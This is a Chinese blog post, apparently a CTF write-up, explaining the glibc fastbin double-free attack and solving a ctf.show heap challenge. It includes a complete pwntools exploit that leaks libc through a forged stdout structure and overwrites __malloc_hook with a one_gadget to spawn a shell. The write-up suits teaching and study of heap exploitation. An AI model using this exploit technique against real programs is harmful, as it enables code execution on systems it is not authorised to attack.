常回家看看之fastbin_attack

于 2024-08-03 15:01:19 发布
阅读量433 收藏 10
点赞数 8
分类专栏: 常回家看看 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/susu_xiaosu/article/details/140890758
版权

常回家看看之fastbin_attack

原理分析

fastbin属于小堆块的管理,这里说的fastbin_attack大多指glibc2.26之前的手法,因为自glibc2.26以后,glibc迎来了一位新成员tcachebin,它减少了堆的开销,使堆管理变得迅速而高效,而且申请的小堆块会优先进入tachebin中,只有tachebin其中一个链表满了再次申请一个相同大小的堆块,若是小堆块再次free会进入fastbin中。

下面主要看一下fastbin,在glibc2.26以前对fastbin double free的检查没有那么严格,也就是说,如果程序里面有UAF漏洞,我们只要free第一个堆块之后free一个别的堆块,再次free第一个堆块,导致double free,实现堆块的伪造和堆块重叠。

也就是如下这种情况

在pwngdb里面是这样的

那么下次申请堆块的时候会把chunk0申请走,如果此时修改了chunk0的fd指针那么就导致把fake_chunk加入到fastbin链表中

就是如下这种情况

那么就可以实现堆块重叠

例题演示

题目保护情况

64位ida逆向

菜单

add函数,存在堆块数量上限,申请堆块之前申请了一个0x28大小的控制堆块,在控制堆块+8位置写上数据堆块地址,然后最后可以向控制堆块+16处的地址可以输入23字节的数据

free函数,存在UAF漏洞,及可以double free

show函数,没有实际的功能

分析

程序没有show功能,我们申请堆块的时候先申请到的控制堆块,然后才是自己输入的size的堆块,但是大小有限制导致不难申请到unsortbin范围大小的chunk,但是我们可以向控制堆块输入内容,导致可以伪造chunk的size位,泄露libc地址只能位置堆块实现堆块重叠,程序存在UAF漏洞,可以double free 从而可以伪造堆块,修改size为unsortbin 大小的范围然后free掉堆块

此时堆块情况

但是此时堆块size位为0x91,申请堆块的时候fastbin有检查,因此我们要复原堆块的size,但是由于没有show功能,所以可以申请堆块到IO结构体上,修改_IO_write_base 导致泄露libc地址,远程的话需要爆破高字节。

堆块7为了防止申请堆块的时候控制堆块切割unsortbin chunk。

然后用同样的手法在__malloc_hook 和 _realloc_hook布置上one_gadget,即可拿到shell

EXP
from pwn import *
context(log_level='debug',arch='amd64',os='linux')
​
io = process('../pwn162')
#io = remote('pwn.challenge.ctf.show', 28304)
libc = ELF('/home/su/PWN/VIPshow/glibc-all-in-one/libs/2.23-0ubuntu3_amd64/libc-2.23.so')
​
def Add(size,name,msg=8 * b'\x00' + p64(0x71) + b'\x00' * 7):
    io.sendlineafter("Your choice : ", '1')
    io.sendlineafter("size of the daniu's name: \n", str(size))
    io.sendafter("daniu's name:\n", name)
    io.sendlineafter("daniu's message:\n", msg)
​
​
​
​
def Delete(idx):
    io.sendlineafter("Your choice : ", '3')
    io.sendlineafter("daniu's index:\n", str(idx))
    io.recvline()
​
​
Add(0x60, 14 * p64(0x71))  # 0
Add(0x60, 14 * p64(0x71))  # 1
#gdb.attach(io)
Delete(0)
Delete(1)
Delete(0)
gdb.attach(io)
Add(0x60, '\x20')  # 2
Add(0x60, '\x20')  # 3
Add(0x60, '\x20')  # 4
Add(0x60, p64(0) + p64(0x71))  # 5
#gdb.attach(io)
Delete(0)
Delete(5)
Add(0x60, p64(0) + p64(0x91))  # 6
Add(0x20, 'bbbb')  # 7
Delete(0)
Delete(5)
Delete(7)
Add(0x60, p64(0) + p64(0x71) + b'\xdd\x45')  # 8
#gdb.attach(io)
Delete(7)
Add(0x60, 'deadbeef')  # 9
Delete(7)
#gdb.attach(io)
io.sendlineafter("Your choice : ", '1')
io.sendlineafter("size of the daniu's name: \n", str(0x60))
io.sendafter("daniu's name:\n", 0x33 * b'\x00' + p64(0x0FBAD1887) + p64(0) * 3 + b'\x58')
libc_base = u64(io.recv(6).ljust(8,b'\x00')) - 0x3c46a3
success('libc_base---->'+hex(libc_base))
pause()
malloc_hook = libc_base +libc.sym['__malloc_hook']
one = libc_base + 0xf1147
realloc  = libc_base   + libc.sym['__realloc_hook']
​
​
​
#gdb.attach(io)
io.sendline('a')
Delete(5)
Delete(0)
Delete(5)
​
Delete(7)
Add(0x60,p64(malloc_hook -0x23))
Delete(7)
Add(0x60,p64(malloc_hook -0x23))
Delete(7)
Add(0x60,p64(malloc_hook -0x23))
​
Delete(7)
payload = b'a'*0xb + p64(one) + p64(realloc) 
#gdb.attach(io)
Add(0x60,payload)
#gdb.attach(io)
io.sendlineafter("Your choice : ", '1')
​
​
​
​
​
io.interactive()
​
CH13hh
关注
  • 8
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
堆学习——fastbin_dup_into_stack
qq_41560595的博客
03-13 486
前面写了double free实现,现在写double free的升级篇, #include <stdio.h> #include <stdlib.h> int main() { fprintf(stderr, "This file extends on fastbin_dup.c by tricking malloc into\n" "returning a pointer to a controlled location (in this case, the
shiro_attack_2.2.zip
07-18
在"shiro_attack_2.2.zip"这个压缩包中,我们可以推测它可能包含了关于Apache Shiro的安全攻击分析或者防御策略,特别是针对其2.2版本的。下面我们将深入探讨Apache Shiro的基本概念、常见攻击以及如何防范这些攻击...
常回家看看之largebin_attack
susu_xiaosu的博客
07-25 1842
【代码】常回家看看之largebin_attack
fastbin attack漏洞之__malloc_hook攻击
董哥的黑板报
08-12 5663
__malloc_hook攻击原理为fastbin attack,见文章:https://blog.csdn.net/qq_41453285/article/details/99315504 一、概念 通过fastbin attack,我们可以发起__malloc_hook攻击,将__malloc_hook作为我们的target 二、攻击方向 方向①:我们可以将__malloc_hook函数...
[pwn]堆:fastbin attack详解
热门推荐
Breeze的博客
12-31 1万+
[pwn]fastbin attack 文章目录[pwn]fastbin attackfastbin attack原理double freeuse after freechunk extend需要注意的点:0ctf:babyheap fastbin attack原理 fastbin attack是利用fastbin分配原理的漏洞,利用要求是我们能够修改“已释放”堆块。通常情况下与double fr...
how2heap(1):fastbin_dup 2.31
hollk’s blog
08-25 856
fastbin_dup 2.27 源码 # gcc -g fastbin_dup.c -o fastbin_dup 1 #include <stdio.h> 2 #include <stdlib.h> 3 #include <assert.h> 4 5 int main() 6 { 7 setbuf(stdout, NULL); 8 9 printf("This file demonstrates a
shiro_attack-2.2.jar
12-17
shiro_attack-2.2.jar
shiro_attack_2.1.zip
10-12
首先,我们来看"shiro_attack_2.0"这个文件,这很可能是该工具的早期版本或者是相关配置或示例。通常,这类工具会包含以下几个关键部分: 1. **PoC(Proof of Concept)代码**:这是验证漏洞存在的最小化代码示例,...
shiro 反序列化漏洞综合利用工具 shiro_attack_by J1anfen
11-05
在提到的 "shiro_attack_by J1anfen" 工具中,重点是针对 Apache Shiro 的一个特定安全问题:反序列化漏洞。 反序列化漏洞通常出现在程序中,当接收到从网络或持久存储中读取的数据,并将其转换回原来的对象实例时...
秒达开源多功能中文工具箱源码:自部署 全开源 轻量级跨平台 GPT级支持+高效UI+Docker
最新发布
09-09
【秒达开源】多功能中文工具箱源码发布:自部署、全开源、轻量级跨平台,GPT级支持+高效UI,Docker/便携版任选,桌面友好+丰富插件生态 这是一款集大成之作,专为追求高效与便捷的用户量身打造。它不仅支持完全自部署,还实现了彻底的开源,确保每一位开发者都能深入了解其内核,自由定制与扩展。 【秒达开源工具箱】以其轻量级的架构设计,实现了在各类设备上的流畅运行,包括ARMv8架构在内的全平台支持,让您无论身处何地,都能享受到同样的便捷体验。我们深知用户需求的多样性,因此特别引入了类似GPT的智能支持功能,让您的操作更加智能、高效。 与此同时,我们注重用户体验,将高效UI与工具箱功能高度集成,使得界面简洁直观,操作流畅自然。为了满足不同用户的部署需求,我们还提供了Docker映像和便携式版本,让您可以根据实际情况灵活选择。 值得一提的是,我们的工具箱还支持桌面版应用,让您在PC端也能享受到同样的强大功能。此外,我们还建立了丰富的开源插件库,不断扩展工具箱的功能边界,让您的工具箱永远保持最新、最全。 【秒达开源】多功能中文工具箱,作为一款永远的自由软件,我们承诺将持续更新、优化,为
双极 AMI 的加扰以及 B8ZS 和 HDB3 加扰simulink.rar
09-09
1.版本:matlab2014/2019a/2024a 2.附赠案例数据可直接运行matlab程序。
C项目开发资源.docx
09-09
对于C/C++项目开发,有许多资源和工具可以帮助开发者提高效率、保证代码质量以及实现项目的自动化构建和部署。以下是一些具体的资源和工具: 1. **集成开发环境(IDE)**: - **CLion**: 专为C和C++开发设计的跨平台IDE,提供了代码分析、调试、版本控制集成等功能。 - **Eclipse CDT**: 基于Eclipse的C/C++开发工具,支持代码补全、调试和项目管理。 - **Visual Studio**: Windows平台上功能强大的IDE,提供了丰富的C++开发支持。 - **Code::Blocks**: 开源的C/C++ IDE,体积小且可定制。 - **KDevelop**: 另一个功能丰富的开源IDE,主要针对Linux平台。 2. **代码编辑器**: - **Visual Studio Code**: 通过C/C++扩展插件,如C/C++插件包,提供智能感知、代码调试等功能。 - **Sublime Text**: 轻量级的文本编辑器,支持大量插件,包括C/C++编译和语法高亮。 3. **编译
基于ssm的在线购物系统的设计与实现设计与实现.docx
09-09
基于ssm的在线购物系统的设计与实现设计与实现.docx
python-对Excel数据处理做可视化分析.zip
09-09
灵敏度分析
logisim-hust-20200118.zip
09-09
logisim-hust-20200118.zip
springboot小说阅读平台的设计毕业论文.docx
09-09
springboot小说阅读平台的设计毕业论文.docx
混合动力汽车动态规划算法理论油耗计算与视频教学,使用matlab编写快速计算程序,整个工程结构模块化,可以快速改为串联,并联,混
09-09
混合动力汽车动态规划算法理论油耗计算与视频教学,使用matlab编写快速计算程序,整个工程结构模块化,可以快速改为串联,并联,混联等。 控制量可以快速扩展为档位,转矩,转速等。 状态量一般为SOC,目标函数可设置为油耗,电耗,以及换挡频次等加权。 程序清晰易调,输出结果定量统计和图表详尽。 DP为混合动力汽车燃油经济性提供了一种极限油耗的方法,利用DP能够得到特定构型在特定工况条件下的极限油耗,为基于规则的控制策略制定和不同规则的制定提供了理论参考和对比指标。 可提供技术指导支持。 DP动态规划初始化文件利用结构体定义各个部件参数,例如发动机,发电机,电机,变速箱,工况,减速器,电池等部件。 能够方便的修改不同部件参数,进行定制开发。 DP动态规划结果后处理程序,绘制多个控制量,状态量等分析图。 另外还绘制发动机工作点,发动机工作时间MAP等。 不同工作模式的电机工作点。 出图丰富,可直接用于lunwen出版。 录制串联动态规划算法理论讲解与代码分析教学视频,方便快速学习与程序理解。 可提供串联,并联(包括P2和P4),混联等构型动态规划程序。
OS20单缸发动机模型3D图纸 STP格式.zip
09-09
OS20单缸发动机模型3D图纸 STP格式.zip
#ifndef EXTER_ATTACK #define EXTER_ATTACK
06-08
`ifndef EXTER_ATTACK`是一个预处理指令,它的意思是如果宏`EXTER_ATTACK`没有被定义(即`#define EXTER_ATTACK`这一行之前没有出现过),那么接下来的代码块将被执行。当这个宏被定义后,`ifndef`检查就会失败,即...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值